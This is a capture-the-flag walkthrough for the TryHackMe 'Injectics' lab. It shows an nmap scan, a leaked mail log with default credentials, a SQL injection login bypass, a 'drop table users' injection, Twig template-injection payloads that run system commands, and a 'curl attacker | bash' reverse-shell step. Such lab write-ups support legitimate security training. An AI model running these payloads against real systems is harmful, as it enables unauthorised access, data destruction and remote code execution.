Understanding Injectics CTF

Injectics is a Capture The Flag (CTF) challenge on TryHackMe that focuses on honing your injection skills to take control of a web application. This guide walks you through the steps to exploit vulnerabilities and gain administrative access.

Key Points

Initial Scan: Use nmap to identify open ports and services.
Information Gathering: Analyze source code and accessible files for clues.
SQL Injection: Exploit weak sanitization in login forms.
Template Injection: Utilize Server-Side Template Injection (SSTI) for further exploitation.
Shell Access: Gain reverse shell access to retrieve the final flag.

Initial Scan

Perform an nmap scan to identify open ports and services:

nmap -sC -sV -T4 XX.XX.XXX.XXX -oN initial

Key findings:

PORT	STATE	SERVICE	VERSION
22	open	ssh	OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80	open	http	Apache httpd 2.4.41 ((Ubuntu))

Port 80 is open and running Apache httpd.

Information Gathering

Visit the Website: Access the web application on port 80.
Source Code Analysis: Inspect the source code for comments or hidden information.
```

```

Access mail.log: Navigate to http://XX.XX.XXX.XXX/mail.log to find sensitive information.

From: dev@injectics.thm
To: superadmin@injectics.thm
Subject: Update before holidays

Hey,

Before heading off on holidays, I wanted to update you on the latest changes to the website. I have implemented several enhancements and enabled a special service called Injectics. This service continuously monitors the database to ensure it remains in a stable state.

To add an extra layer of safety, I have configured the service to automatically insert default credentials into the `users` table if it is ever deleted or becomes corrupted. This ensures that we always have a way to access the system and perform necessary maintenance. I have scheduled the service to run every minute.

Here are the default credentials that will be added:

| Email                     | Password              |
|---------------------------|-----------------------|
| superadmin@injectics.thm  | superSecurePasswd101  |
| dev@injectics.thm         | devPasswd123          |

Please let me know if there are any further updates or changes needed.

Best regards,
Dev Team

dev@injectics.thm

SQL Injection

Analyze script.js: Inspect the JavaScript file used for the login form.

const invalidKeywords = ['or', 'and', 'union', 'select', '"', "'"];
for (let keyword of invalidKeywords) {
    if (username.includes(keyword)) {
        alert('Invalid keywords detected');
        return false;
    }
}

Bypass Sanitization: Use Burp Suite to intercept and modify the login request.
```
username=a' || 1=1 -- -&password=a&function=login
```
Successful login as admin.

Delete Users Table

Admin Dashboard: Use the admin dashboard to perform SQL injection.
```
rank=1&country=&gold=23;drop table users -- -&silver=21&bronze=12345
```
The page displays: Seems like database or some important table is deleted. InjecticsService is running to restore it. Please wait for 1-2 minutes.
Login with Default Credentials: Wait for the service to restore the table and login with the credentials found in mail.log.

Template Injection

Update Profile: Navigate to update_profile.php and test for Server-Side Template Injection (SSTI).
```
{{2*2}}
```
The dashboard displays: Welcome, 4!
Exploit SSTI: Use payloads to execute system commands.
```
{{['id',""]|sort('passthru')}}
```
Output: Welcome, uid=33(www-data) gid=33(www-data) groups=33(www-data) Array!

Shell Access

Create Reverse Shell: Use a reverse shell payload to gain access.
```
{{['curl XX.XX.XX.XX|bash',""]|sort('passthru')}}
```
Successfully gain reverse shell access and retrieve the second flag.

Learn More

For more detailed information on injection techniques and CTF challenges, explore resources on TryHackMe and other cybersecurity platforms.